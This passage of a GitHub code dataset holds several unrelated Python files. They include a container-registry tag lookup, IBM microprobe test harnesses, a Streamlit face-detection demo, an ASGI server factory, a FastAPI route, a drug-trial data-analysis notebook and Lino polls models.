In the case of GCR, this is \"_json_key\"\n \"\"\"\n # _json_key is used for Google Container Registry\n if user == \"_json_key\":\n url = \"https://{registry}/v2/{project}/{repo}/tags/list\".format(\n registry=registry_prefix, project=project_id, repo=image_name\n )\n response = requests.get(url, auth=(user, password))\n content = json.loads(response.text)\n time_stamp = 0\n latest_tag = \"\"\n for digest in content[\"manifest\"].items():\n if int(digest[1][\"timeUploadedMs\"]) > time_stamp:\n time_stamp = int(digest[1][\"timeUploadedMs\"])\n latest_tag = digest[1][\"tag\"]\n try:\n image_tag = latest_tag[0]\n except IndexError:\n print(\n \"Oops: No tags found for \"\n + registry_prefix\n + \"/\"\n + project_id\n + \"/\"\n + image_name\n )\n print(\"Please ensure at least one tag is pushed and try again\")\n exit(1)\n # Else if we're dealing with Azure CR\n elif \"azurecr.io\" in registry_prefix:\n url = \"https://{registry}/acr/v1/{repo}/_manifests\".format(\n registry=registry_prefix, repo=image_name\n )\n response = requests.get(url, auth=(user, password))\n content = json.loads(response.text)\n time_stamp = datetime.datetime.strptime(\"1970-01-01\", \"%Y-%m-%d\")\n latest_tag = \"\"\n for manifest in content[\"manifests\"]:\n manifest_timestamp = datetime.datetime.strptime(\n manifest[\"lastUpdateTime\"][:-3], \"%Y-%m-%dT%H:%M:%S.%f\"\n )\n if manifest_timestamp > time_stamp:\n try:\n latest_tag = manifest[\"tags\"][0]\n time_stamp = manifest_timestamp\n except KeyError:\n # Sometimes the manifest may not have any tags associated.\n continue\n if latest_tag == \"\":\n # We've scanned everything and found nothing\n print(\n \"No tags found in ACR. Please ensure at least one tag is pushed and try again\"\n )\n exit(1)\n image_tag = latest_tag\n # Future: Add additional registry logic\n else:\n print(\n \"Error: Cannot understand the registry used for latest image calculation. 
Please use ACR or GCR\"\n )\n exit(1)\n\n return image_tag\n","repo_name":"pradeepspak/Bumdlewrap","sub_path":"libs/docker_repo_functions.py","file_name":"docker_repo_functions.py","file_ext":"py","file_size_in_byte":3025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"40955434961","text":"from __future__ import absolute_import, print_function\n\n# Built-in modules\nimport ctypes\nimport os\nimport shutil\nimport signal\nimport time\nimport subprocess\nfrom tempfile import SpooledTemporaryFile, mkdtemp\nfrom unittest import TestCase, main, skipIf\n\n# Third party modules\n\n# Own modules\nimport microprobe\n\n\n__author__ = \"Ramon Bertran\"\n__copyright__ = \"Copyright 2011-2021 IBM Corporation\"\n__credits__ = []\n__license__ = \"IBM (c) 2011-2021 All rights reserved\"\n__version__ = \"0.5\"\n__maintainer__ = \"Ramon Bertran\"\n__email__ = \"rbertra@us.ibm.com\"\n__status__ = \"Development\" # \"Prototype\", \"Development\", or \"Production\"\n\n# Constants\nMP_TESTING_ARCH = os.environ.get(\"MP_TESTING_ARCH\", None)\nif MP_TESTING_ARCH is not None:\n if MP_TESTING_ARCH.startswith(\"POWER\"):\n MP_TESTING_ARCH = \"POWER\"\nBASEPATH = os.path.join(os.path.dirname(microprobe.__file__), \"..\", \"..\")\n_LIBC = ctypes.CDLL(\"libc.so.6\")\n\n\ndef _get_child_processes(parent_pid):\n ps_command = subprocess.Popen(\"ps -o pid --ppid %d --noheaders\" %\n parent_pid,\n shell=True,\n stdout=subprocess.PIPE)\n ps_output = ps_command.stdout.read()\n retcode = ps_command.wait()\n if retcode == 1:\n return []\n elif retcode == 0:\n if isinstance(ps_output, bytes):\n ps_output = ps_output.decode()\n pids = ps_output.split(\"\\n\")[:-1]\n for pid_str in ps_output.split(\"\\n\")[:-1]:\n pids += _get_child_processes(int(pid_str))\n return pids\n else:\n return []\n\n\ndef _kill_child_processes(parent_pid, sig=signal.SIGKILL):\n\n pids = _get_child_processes(parent_pid)\n\n for pid_str in pids:\n\n try:\n os.kill(int(pid_str), sig)\n except IOError:\n print(\"unable to kill: %s\" % pid_str)\n continue\n\n\ndef _set_pdeathsig(sig=signal.SIGKILL):\n\n def function():\n \"\"\"\n Kill process function\n \"\"\"\n return _LIBC.prctl(1, sig)\n\n return function\n\n\n# Classes\nclass power_example_suite(TestCase): # pylint: disable=invalid-name\n \"\"\"\n Power_example_suite Test Class.\n \"\"\"\n _multiprocess_can_split_ = True\n _multiprocess_shared_ = False\n\n name = \"power_example\"\n description = \"power example tests\"\n target = os.path.join(BASEPATH, \"targets\")\n trials = 3\n timeout = 20 # in seconds\n\n def _dir(self, arch='power'):\n return \"%s/targets/%s/examples/\" % (BASEPATH, arch)\n\n def setUp(self):\n tempdir = mkdtemp(prefix=\"microprobe_examples_%s_\" % self.name,\n suffix=\".example\")\n self.dirnames = [tempdir]\n\n def tearDown(self):\n for dirname in self.dirnames:\n shutil.rmtree(dirname)\n\n @skipIf(MP_TESTING_ARCH not in [None, \"POWER\"], \"Long testing\")\n def test_001(self):\n \"\"\"\n power_example_suite: isa_power_v206_info.py\n \"\"\"\n self._wrapper([self._dir() + 'isa_power_v206_info.py'])\n\n @skipIf(MP_TESTING_ARCH not in [None, \"POWER\"], \"Long testing\")\n def test_002(self):\n \"\"\"\n power_example_suite: power_v206_power7_ppc64_linux_gcc_profile.py\n \"\"\"\n self._wrapper([\n self._dir() + 'power_v206_power7_ppc64_linux_gcc_profile.py', '-p',\n '1', '-O', self.dirnames[0]\n ])\n\n @skipIf(MP_TESTING_ARCH not in [None, \"POWER\"], \"Long testing\")\n def test_003(self):\n \"\"\"\n power_example_suite: 
power_v206_power7_ppc64_linux_gcc_fu_stress.py\n \"\"\"\n self._wrapper([\n self._dir() + 'power_v206_power7_ppc64_linux_gcc_fu_stress.py',\n '-O', self.dirnames[0]\n ])\n\n @skipIf(MP_TESTING_ARCH not in [None, \"POWER\"], \"Long testing\")\n def test_004(self):\n \"\"\"\n power_example_suite: power_v206_power7_ppc64_linux_gcc_memory.py\n \"\"\"\n self._wrapper([\n self._dir() + 'power_v206_power7_ppc64_linux_gcc_memory.py',\n self.dirnames[0]\n ])\n\n @skipIf(MP_TESTING_ARCH not in [None, \"POWER\"], \"Long testing\")\n def test_005(self):\n \"\"\"\n power_example_suite: power_v206_power7_ppc64_linux_gcc_random.py\n \"\"\"\n self._wrapper([\n self._dir() + 'power_v206_power7_ppc64_linux_gcc_random.py',\n self.dirnames[0]\n ])\n\n @skipIf(MP_TESTING_ARCH not in [None, \"POWER\"], \"Long testing\")\n def test_006(self):\n \"\"\"\n power_example_suite: power_v206_power7_ppc64_linux_gcc_custom.py\n \"\"\"\n self._wrapper([\n self._dir() + 'power_v206_power7_ppc64_linux_gcc_custom.py',\n self.dirnames[0]\n ])\n\n @skipIf(True, \"Deprecated (removing PyEvolve)\")\n @skipIf(MP_TESTING_ARCH not in [None, \"POWER\"], \"Long testing\")\n def test_007(self):\n \"\"\"\n power_example_suite: power_v206_power7_ppc64_linux_gcc_genetic.py\n \"\"\"\n self._wrapper([\n self._dir() + 'power_v206_power7_ppc64_linux_gcc_genetic.py',\n self.dirnames[0],\n '%s/genetic_eval.sh' % self._dir('power')\n ])\n\n def _wrapper(self, commands):\n \"\"\"\n Common execution wrapper\n \"\"\"\n\n print(\" \".join(commands))\n\n for dummy_trial in range(0, self.trials):\n tfile = SpooledTemporaryFile()\n process = subprocess.Popen(commands,\n stdout=tfile,\n stderr=subprocess.STDOUT,\n preexec_fn=_set_pdeathsig(\n signal.SIGTERM))\n ctime = 0\n\n while ctime < self.timeout:\n\n error_code = process.poll()\n\n if error_code is None:\n time.sleep(0.1)\n ctime += 0.1\n else:\n break\n\n if error_code == 0:\n break\n elif error_code is None:\n try:\n _kill_child_processes(process.pid)\n process.kill()\n except OSError:\n # Maybe the process already finished\n pass\n error_code = 0\n break\n\n if error_code != 0:\n tfile.seek(0)\n print(tfile.read())\n\n self.assertEqual(error_code, 0)\n\n\nTEST_CLASSES = [power_example_suite]\n\nif __name__ == '__main__':\n main()\n","repo_name":"IBM/microprobe","sub_path":"targets/power/tests/examples/examples_power_tests.py","file_name":"examples_power_tests.py","file_ext":"py","file_size_in_byte":6460,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"77"} +{"seq_id":"3705073589","text":"import streamlit as st\nimport os\nfrom pathlib import Path\nfrom PIL import Image, ImageEnhance\nimport numpy as np\nimport cv2\nimport time\nimport pathlib\n\nst.set_page_config(page_title=None, page_icon=None, layout=\"wide\", initial_sidebar_state=\"auto\", menu_items=None)\ncwd = pathlib.PureWindowsPath(__file__)\n\n#------------------------------------------Ex1----------------------------------------------\n#no_camera = cwd.parent.parent / \"data\" / \"no_camera.png\"\n#swith = st.checkbox(\"Camera is active\", value = True) #st.button(\"ON/OFF\") \n#col1, col2 = st.columns(2)\n#\n#with col1:\n# if swith:\n# picture = st.camera_input(\"Take a picture\", key=\"camera1\")\n# else:\n# image = Image.open(str(no_camera))\n# st.image(image)\n#\n##------------------------------------------Ex1a---------------------------------------------\n#\n#face_cascade = cv2.CascadeClassifier(str(cwd.parent.parent / \"data\" / 'haarcascade_frontalface_default.xml'))\n#with 
col2:\n# if picture is not None:\n# st.info(\"Detection of face\")\n# # To read image file buffer with OpenCV:\n# bytes_data = picture.getvalue()\n# cv2_img = cv2.imdecode(np.frombuffer(bytes_data, np.uint8), cv2.IMREAD_COLOR)\n# gray = cv2.cvtColor(cv2_img, cv2.COLOR_RGB2GRAY)\n# # Detect the faces\n# faces = face_cascade.detectMultiScale(gray, 1.1, 4)\n# # Draw the rectangle around each face\n# for (x, y, w, h) in faces:\n# cv2.rectangle(cv2_img, (x, y), (x+w, y+h), (255, 0, 0), 2)\n# # Display\n# cv2_img = cv2.cvtColor(cv2_img, cv2.COLOR_BGR2RGB)\n# st.image(cv2_img)\n#\n#------------------------------------------Ex2----------------------------------------------\nslide = st.sidebar\nimage_placeholder = st.empty()\n#\nface_cascade = cv2.CascadeClassifier(str(cwd.parent.parent / \"data\" / 'haarcascade_frontalface_default.xml'))\n#\ndef detect_face(img):\n gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n # Detect the faces\n faces = face_cascade.detectMultiScale(gray, 1.1, 4)\n # Draw the rectangle around each face\n for (x, y, w, h) in faces:\n cv2.rectangle(img, (x, y), (x+w, y+h), (255, 0, 0), 2)\n return img\n#\ndef rotate_image(img, center = False, clockwise = False, counterclockwise = False):\n img = Image.fromarray(img)\n if clockwise:\n img = img.transpose(Image.ROTATE_90)\n if center:\n img = img.transpose(0)\n if counterclockwise:\n img = img.rotate(-90)\n img = np.array(img)\n return img\n\ndef brightness_contrast(img, contrast = 0, brightness = 1.0):\n\n img = Image.fromarray(img)\n im_out = ImageEnhance.Brightness(img).enhance(float(brightness))\n im_out = ImageEnhance.Contrast(im_out).enhance(float(contrast))\n im_out = np.array(im_out)\n return im_out\n\nwith slide:\n contrast = st.slider(\"Contrast\", min_value=0.0, max_value=2.0, value=1.0, step=0.01)\n brightness = st.number_input(\"Brightness\", min_value=0.0, max_value=2.0, value=0.5, step=0.01)\n clockwise = st.button(\"ROTATE +90\")\n counterclockwise =st.button(\"ROTATE -90\")\n center =st.button(\"CENTER\")\n\ndef transform(frame):\n frame = brightness_contrast(frame, contrast=contrast, brightness=brightness)\n frame = rotate_image(frame, center, clockwise, counterclockwise)\n return frame\n\n#\nvideo = cv2.VideoCapture(0)\nok = True\nwhile ok:\n ok, frame = video.read()\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n # To read image file buffer as a PIL Image:\n frame = transform(frame)\n frame = detect_face(frame)\n with image_placeholder:\n st.image(frame)","repo_name":"modvala/streamlit-demo-templates","sub_path":"src/st_face.py","file_name":"st_face.py","file_ext":"py","file_size_in_byte":3575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"72040634808","text":"# a,b,c = 0\n# Non-iterable Object\na,b,c = 0,0,0\n\na,b,c = [0,0,0]\n# Array Destructing\na,b,c = [0,0],[1,1],[2,2]\n# a,b,c = {0,0,0},0,0\n\n# Object Literal\n\nstate = {\n 'login': None,\n 'signup': None,\n 'user': {\n 'name':'jai',\n 'age':13\n }\n}\n\n# {} [] () set() - Pass by Reference\nuserRef = state['user']\n# userRef['name'] = 'dev'\n# print(userRef)\n\n# Object Destructing\nuserVal = {**state['user']}\nuserVal['name'] = 'dev'\nprint(userVal);\n\n\nprint(state)\n# print(state['login'])\nx = dict(aa=dict(aaa=1,aaaa=2),bb=2,cc=3)\nprint(x.aa)\n# print(x['aa'])\n# print(x.aa)\n# print(x['aa']['aaa'])\n\n# a = [0,0,0]\n# 
print(a,b,c)","repo_name":"DevBaweja/Python-Zero-to-Mastery","sub_path":"Destructing.py","file_name":"Destructing.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"26193339034","text":"\"\"\"Movie finders module.\"\"\"\n\nimport csv\nimport sqlite3\nfrom typing import Callable, List\n\nfrom .entities import Movie\n\n\nclass MovieFinder:\n\n def __init__(self, movie_factory: Callable[..., Movie]) -> None:\n self._movie_factory = movie_factory\n\n def find_all(self) -> List[Movie]:\n raise NotImplementedError()\n\n\nclass CsvMovieFinder(MovieFinder):\n\n def __init__(\n self,\n movie_factory: Callable[..., Movie],\n path: str,\n delimiter: str,\n ) -> None:\n self._csv_file_path = path\n self._delimiter = delimiter\n super().__init__(movie_factory)\n\n def find_all(self) -> List[Movie]:\n with open(self._csv_file_path) as csv_file:\n csv_reader = csv.reader(csv_file, delimiter=self._delimiter)\n return [self._movie_factory(*row) for row in csv_reader]\n\n\nclass SqliteMovieFinder(MovieFinder):\n\n def __init__(\n self,\n movie_factory: Callable[..., Movie],\n path: str,\n ) -> None:\n self._database = sqlite3.connect(path)\n super().__init__(movie_factory)\n\n def find_all(self) -> List[Movie]:\n with self._database as db:\n rows = db.execute(\"SELECT title, year, director FROM movies\")\n return [self._movie_factory(*row) for row in rows]\n","repo_name":"ets-labs/python-dependency-injector","sub_path":"examples/miniapps/movie-lister/movies/finders.py","file_name":"finders.py","file_ext":"py","file_size_in_byte":1326,"program_lang":"python","lang":"en","doc_type":"code","stars":3320,"dataset":"github-code","pt":"77"} +{"seq_id":"7345017497","text":"ativos = []\n\n# Entrada da quantidade de ativos\nquantidadeAtivos = int(input())\n\n# Entrada dos códigos dos ativos\nfor _ in range(quantidadeAtivos):\n codigoAtivo = input()\n ativos.append(codigoAtivo)\n\n# Ordenação em ordem alfabéticas\n\ndef ordenando(ativos):\n ativos.sort()\n return ativos\n\nresultado = ordenando(ativos)\n\nfor x in resultado:\n print(x, end=\"\\n\")","repo_name":"rabmorim/BootcampPython","sub_path":"Desafio_Codigo/organizando_ativos.py","file_name":"organizando_ativos.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"6631979078","text":"__version__ = \"0.2.0\"\n\nfrom qactuar.config import Config, config_init\nfrom qactuar.models import ASGIApp\nfrom qactuar.servers.async_only import AsyncOnlyServer\nfrom qactuar.servers.base import BaseQactuarServer\nfrom qactuar.servers.prefork import PreForkServer\nfrom qactuar.servers.simple_fork import SimpleForkServer\n\n\ndef make_server(\n host: str = None,\n port: int = None,\n app: ASGIApp = None,\n conf: Config = None,\n) -> BaseQactuarServer:\n if conf is None:\n conf = config_init()\n if conf.SERVER_TYPE.lower() == \"simple_fork\":\n return SimpleForkServer(host, port, app, conf)\n elif conf.SERVER_TYPE.lower() == \"prefork\":\n return PreForkServer(host, port, app, conf)\n elif conf.SERVER_TYPE.lower() == \"async_only\":\n return AsyncOnlyServer(host, port, app, conf)\n else:\n raise ValueError(f\"server_type parameter not recognised: {conf.SERVER_TYPE}\")\n\n\ndef run(\n host: str = None,\n port: int = None,\n app: ASGIApp = None,\n conf: Config = None,\n) -> None:\n qactuar_server = make_server(host, port, app, conf)\n 
qactuar_server.serve_forever()\n","repo_name":"Ayehavgunne/Qactuar","sub_path":"qactuar/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"70953880889","text":"import json\n\nfrom fastapi import APIRouter, Request\n\nfrom PortSe.Mapping import Mapping\n\nrouter = APIRouter()\n\n\n@router.get('/{destination_port}/{protocol}')\nasync def view_mapping(destination_port: int, protocol: str, req: Request):\n ''' View Forward Mapping. '''\n address = req.client.host\n\n mapping = Mapping(address)\n mapped = mapping.view(destination_port, protocol)\n\n if mapped is None:\n return {'success': False}\n\n return {\n 'success': True,\n 'mapping': mapped\n }\n","repo_name":"danieluhm2004/portse","sub_path":"API/v1/Mapping/view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"15408031451","text":"\n# coding: utf-8\n\n# In[3]:\n\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n\n# In[4]:\n\n\nmouse_file = \"raw_data/mouse_drug_data.csv\"\ntrial_file = \"raw_data/clinicaltrial_data.csv\"\n\n\n# In[5]:\n\n\nmouse_df = pd.read_csv(mouse_file)\ntrial_df = pd.read_csv(trial_file)\n\n\n# In[6]:\n\n\nmouse_df.head()\n\n\n# In[7]:\n\n\ntrial_df.head()\n\n\n# In[8]:\n\n\nfull_df = pd.merge(mouse_df, trial_df, on=\"Mouse ID\")\nfull_df.head()\n\n\n# In[9]:\n\n\ntumor_response_error = full_df.groupby([\"Drug\",\"Timepoint\"])[\"Tumor Volume (mm3)\"].sem()\ntre_df = tumor_response_error.to_frame()\ntre_df = tre_df.rename(columns= {\"Tumor Volume (mm3)\": \"Standard Error\"})\ntre_df = tre_df.unstack(0)\ntre_df.head()\n\n\n# In[10]:\n\n\nfull_df.groupby(\"Drug\")[\"Timepoint\"].count()\ntumor_response = full_df.groupby([\"Drug\", \"Timepoint\"])\ntumor_df = tumor_response[\"Tumor Volume (mm3)\"].mean().to_frame()\ntumor_df.head()\n\n\n# In[11]:\n\n\ntumor_plot_pre = tumor_df.unstack(0)\ntumor_plot_df = tumor_plot_pre[\"Tumor Volume (mm3)\"]\ntumor_plot_df\n\n\n# In[12]:\n\n\nfull_df.groupby(\"Drug\")[\"Timepoint\"].count()\nmeta_response = full_df.groupby([\"Drug\", \"Timepoint\"])\nmeta_df = meta_response[\"Metastatic Sites\"].mean().to_frame()\nmeta_df.head()\n\n\n# In[13]:\n\n\nx_axis = [0,5,10,15,20,25,30,35,40,45]\nx_limit = 45\nplt.figure(figsize=(10,7))\n\nerror = tre_df[\"Standard Error\"][\"Capomulin\"]\ncap = plt.errorbar(x_axis, tumor_plot_df[\"Capomulin\"], yerr=error, fmt=\"o\", ls=\"dashed\", linewidth=1, alpha=1, capsize=3)\n\nerror = tre_df[\"Standard Error\"][\"Infubinol\"]\ninfu = plt.errorbar(x_axis, tumor_plot_df[\"Infubinol\"], yerr=error, fmt=\"^\", ls=\"dashed\", linewidth=1, alpha=1, capsize=3)\n\nerror = tre_df[\"Standard Error\"][\"Ketapril\"]\nketa = plt.errorbar(x_axis, tumor_plot_df[\"Ketapril\"], yerr=error, fmt=\"s\", ls=\"dashed\", linewidth=1, alpha=1, capsize=3)\n\nerror = tre_df[\"Standard Error\"][\"Placebo\"]\nplac = plt.errorbar(x_axis, tumor_plot_df[\"Placebo\"], yerr=error, fmt=\"D\", ls=\"dashed\", linewidth=1, alpha=1, capsize=3)\n\nplt.ylim(20, 80)\nplt.xlim(0, 45)\n\nplt.title(\"Tumor Response to Treatment\", fontsize=20)\nplt.xlabel(\"Time (Days)\", fontsize=14)\nplt.ylabel(\"Tumor Volume (mm3)\", fontsize=14)\n\nplt.grid(linestyle=\"dashed\")\nplt.legend((cap, infu, keta, plac), (\"Capomulin\", \"Infubinol\", \"Ketapril\", \"Placebo\"), 
fontsize=12)\nplt.show()\n\n\n# In[14]:\n\n\n#This plot is with seaborn\nx_axis = [0,5,10,15,20,25,30,35,40,45]\nx_limit = 45\nplt.figure(figsize=(10,7))\n\nerror = tre_df[\"Standard Error\"][\"Capomulin\"]\ncap = plt.errorbar(x_axis, tumor_plot_df[\"Capomulin\"], yerr=error, fmt=\"o\", ls=\"dashed\", linewidth=1, alpha=1, capsize=3)\n\nerror = tre_df[\"Standard Error\"][\"Infubinol\"]\ninfu = plt.errorbar(x_axis, tumor_plot_df[\"Infubinol\"], yerr=error, fmt=\"^\", ls=\"dashed\", linewidth=1, alpha=1, capsize=3)\n\nerror = tre_df[\"Standard Error\"][\"Ketapril\"]\nketa = plt.errorbar(x_axis, tumor_plot_df[\"Ketapril\"], yerr=error, fmt=\"s\", ls=\"dashed\", linewidth=1, alpha=1, capsize=3)\n\nerror = tre_df[\"Standard Error\"][\"Placebo\"]\nplac = plt.errorbar(x_axis, tumor_plot_df[\"Placebo\"], yerr=error, fmt=\"D\", ls=\"dashed\", linewidth=1, alpha=1, capsize=3)\n\nplt.ylim(20, 80)\nplt.xlim(0, 45)\nplt.style.use('seaborn-whitegrid')\nplt.title(\"Tumor Response to Treatment\", fontsize=20)\nplt.xlabel(\"Time (Days)\", fontsize=14)\nplt.ylabel(\"Tumor Volume (mm3)\", fontsize=14)\n\nplt.grid(linestyle=\"dashed\")\nplt.legend((cap, infu, keta, plac), (\"Capomulin\", \"Infubinol\", \"Ketapril\", \"Placebo\"), fontsize=12)\nplt.show()\n\n\n# In[15]:\n\n\nmeta_response_error = full_df.groupby([\"Drug\",\"Timepoint\"])[\"Metastatic Sites\"].sem()\nmre_df = meta_response_error.to_frame()\nmre_df = mre_df.rename(columns= {\"Metastatic Sites\": \"Standard Error\"})\nmre_df = mre_df.unstack(0)\nmre_df.head()\n\n\n# In[16]:\n\n\nmeta_plot_pre = meta_df.unstack(0)\nmeta_plot_df = meta_plot_pre[\"Metastatic Sites\"]\nmeta_plot_df.head()\n\n\n# In[17]:\n\n\nplt.figure(figsize=(10,7))\n\nerror2 = mre_df[\"Standard Error\"][\"Capomulin\"]\ncap2 = plt.errorbar(x_axis, meta_plot_df[\"Capomulin\"], yerr=error2, fmt=\"o\", ls=\"dashed\", linewidth=1, alpha=1, capsize=3)\n\nerror2 = mre_df[\"Standard Error\"][\"Infubinol\"]\ninfu2 = plt.errorbar(x_axis, meta_plot_df[\"Infubinol\"], yerr=error2, fmt=\"^\", ls=\"dashed\", linewidth=1, alpha=1, capsize=3)\n\nerror2 = mre_df[\"Standard Error\"][\"Ketapril\"]\nketa2 = plt.errorbar(x_axis, meta_plot_df[\"Ketapril\"], yerr=error2, fmt=\"s\", ls=\"dashed\", linewidth=1, alpha=1, capsize=3)\n\nerror2 = mre_df[\"Standard Error\"][\"Placebo\"]\nplac2 = plt.errorbar(x_axis, meta_plot_df[\"Placebo\"], yerr=error2, fmt=\"D\", ls=\"dashed\", linewidth=1, alpha=1, capsize=3)\n\nplt.ylim(0, 4)\nplt.xlim(0, 45)\n\nplt.title(\"Metastatic Spread During Treatment\", fontsize=20)\nplt.xlabel(\"Treatment Duration (Days)\", fontsize=14)\nplt.ylabel(\"Metastatic Sites\", fontsize=14)\n\nplt.grid(linestyle=\"dashed\")\nplt.legend((cap2, infu2, keta2, plac2), (\"Capomulin\", \"Infubinol\", \"Ketapril\", \"Placebo\"), fontsize=12)\nplt.show()\n\n\n# In[18]:\n\n\npre_mice = full_df.groupby([\"Drug\", \"Timepoint\"])[\"Mouse ID\"].nunique()\nmice = pre_mice.to_frame()\nmice = mice.rename(columns={\"Mouse ID\": \"Mouse Count\"})\nmice.head()\n\n\n# In[19]:\n\n\nmice_plot = mice.unstack(0)\nmice_df = mice_plot[\"Mouse Count\"]\nmice_df\n\n\n# In[20]:\n\n\nplt.figure(figsize=(10,7))\n\ncap3 = plt.errorbar(x_axis, (mice_df[\"Capomulin\"]/25*100), fmt=\"o\", ls=\"dashed\", linewidth=1, alpha=1, capsize=3)\ninfu3 = plt.errorbar(x_axis, (mice_df[\"Infubinol\"]/25*100), fmt=\"^\", ls=\"dashed\", linewidth=1, alpha=1, capsize=3)\nketa3 = plt.errorbar(x_axis, (mice_df[\"Ketapril\"]/25*100), fmt=\"s\", ls=\"dashed\", linewidth=1, alpha=1, capsize=3)\nplac3 = plt.errorbar(x_axis, 
(mice_df[\"Placebo\"]/25*100), fmt=\"D\", ls=\"dashed\", linewidth=1, alpha=1, capsize=3)\n\nplt.ylim(40, 100)\nplt.xlim(0, 45)\n\nplt.title(\"Survival During Treatment\", fontsize=20)\nplt.xlabel(\"Time (Days)\", fontsize=14)\nplt.ylabel(\"Survival Rate (%)\", fontsize=14)\n\nplt.grid(linestyle=\"dashed\")\nplt.legend((cap3, infu3, keta3, plac3), (\"Capomulin\", \"Infubinol\", \"Ketapril\", \"Placebo\"), fontsize=12)\nplt.show()\n\n\n# In[21]:\n\n\ncapchange = ((tumor_plot_df[\"Capomulin\"][45] - tumor_plot_df[\"Capomulin\"][0])/45)*100\nceftchange = ((tumor_plot_df[\"Ceftamin\"][45] - tumor_plot_df[\"Ceftamin\"][0])/45)*100\ninfuchange = ((tumor_plot_df[\"Infubinol\"][45] - tumor_plot_df[\"Infubinol\"][0])/45)*100\nketachange = ((tumor_plot_df[\"Ketapril\"][45] - tumor_plot_df[\"Ketapril\"][0])/45)*100\nnaftchange = ((tumor_plot_df[\"Naftisol\"][45] - tumor_plot_df[\"Naftisol\"][0])/45)*100\nplacchange = ((tumor_plot_df[\"Placebo\"][45] - tumor_plot_df[\"Placebo\"][0])/45)*100\npropchange = ((tumor_plot_df[\"Propriva\"][45] - tumor_plot_df[\"Propriva\"][0])/45)*100\nramichange = ((tumor_plot_df[\"Ramicane\"][45] - tumor_plot_df[\"Ramicane\"][0])/45)*100\nstelchange = ((tumor_plot_df[\"Stelasyn\"][45] - tumor_plot_df[\"Stelasyn\"][0])/45)*100\nzonichange = ((tumor_plot_df[\"Zoniferol\"][45] - tumor_plot_df[\"Zoniferol\"][0])/45)*100\n\n\n# In[22]:\n\n\ndrug_change_df = pd.DataFrame({\"Drug\": [\"Capomulin\", \"Infubinol\", \"Ketapril\", \"Placebo\"],\n \"Percent Change\": [capchange, infuchange, ketachange, placchange]\n })\ndrug_change_df\n\n\n# In[23]:\n\n\nplt.figure(figsize=(8,5))\n\nrects1 = plt.bar(0, drug_change_df[\"Percent Change\"][0], color='g', alpha=1, align=\"edge\", ec=\"black\", width=1)\nrects2 = plt.bar(1, drug_change_df[\"Percent Change\"][1], color='r', alpha=1, align=\"edge\", ec=\"black\", width=1)\nrects3 = plt.bar(2, drug_change_df[\"Percent Change\"][2], color='r', alpha=1, align=\"edge\", ec=\"black\", width=1)\nrects4 = plt.bar(3, drug_change_df[\"Percent Change\"][3], color='r', alpha=1, align=\"edge\", ec=\"black\", width=1)\ntick_locations = [value+0.5 for value in x_axis]\nplt.grid(linestyle=\"dashed\")\nplt.xticks(tick_locations, drug_change_df[\"Drug\"])\nplt.xlim(0, 4)\nplt.ylim(-30, 70)\n\n\n# In[24]:\n\n\nplt.title(\"Tumor Change Over 45 Day Treatment\", fontsize=20)\nplt.ylabel(\"% Tumor Volume Change\")\n\n\n# In[25]:\n\n\ndef autolabel(rects):\n for rect in rects:\n height = rect.get_height()\n plt.text(rect.get_x() + rect.get_width()/2., -8,\n '%d' % int(height) + \"%\", \n ha='center', va='bottom', color='white', fontsize=14)\n\nautolabel(rects1)\n\n\n# In[26]:\n\n\ndef autolabel(rects):\n for rect in rects:\n height = rect.get_height()\n plt.text(rect.get_x() + rect.get_width()/2., 2,\n '%d' % int(height) + \"%\", \n ha='center', va='bottom', color='white', fontsize=14)\n\nautolabel(rects2)\nautolabel(rects3)\nautolabel(rects4)\n\n\n# In[27]:\n\n\nplt.show()\n\n","repo_name":"samhazemi/dascienceHM","sub_path":"homeworksolved/week5a/Pymaceuticals.py","file_name":"Pymaceuticals.py","file_ext":"py","file_size_in_byte":8453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"17081025912","text":"from builtins import str\nfrom builtins import object\n\nimport logging\nlogger = logging.getLogger(__name__)\n\nfrom django.db import models\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.utils.translation import pgettext_lazy as pgettext\n\n# om atelier import rstgen\nfrom 
lino.api import dd, rt\nfrom lino import mixins\nfrom lino.utils import join_elems\n\nfrom lino.utils.xmlgen import html as xghtml\nfrom lino.utils.xmlgen.html import E\n\nfrom lino.mixins import Referrable\n\nfrom lino.modlib.users.mixins import ByUser, UserAuthored\n\nfrom .utils import ResponseStates, PollStates\nfrom .roles import PollsUser, PollsStaff\n\nNullBooleanField = models.NullBooleanField\n\n\nclass ChoiceSet(mixins.BabelNamed):\n\n class Meta(object):\n app_label = 'polls'\n verbose_name = _(\"Choice Set\")\n verbose_name_plural = _(\"Choice Sets\")\n\n\nclass ChoiceSets(dd.Table):\n required_roles = dd.required(PollsStaff)\n model = 'polls.ChoiceSet'\n detail_layout = \"\"\"\n name\n ChoicesBySet\n \"\"\"\n\n\nclass Choice(mixins.BabelNamed, mixins.Sequenced):\n\n class Meta(object):\n app_label = 'polls'\n verbose_name = _(\"Choice\")\n verbose_name_plural = _(\"Choices\")\n\n choiceset = models.ForeignKey('polls.ChoiceSet', related_name='choices')\n\n def get_siblings(self):\n return self.choiceset.choices.order_by('seqno')\n\n @dd.action()\n def select_by_response(self, ar):\n mi = ar.master_instance\n dd.logger.info(\"20140929 %s\", mi)\n if isinstance(mi, Response):\n AnswerChoice(response=mi, choice=self).save()\n\n\nclass Choices(dd.Table):\n model = 'polls.Choice'\n required_roles = dd.required(PollsStaff)\n\n\nclass 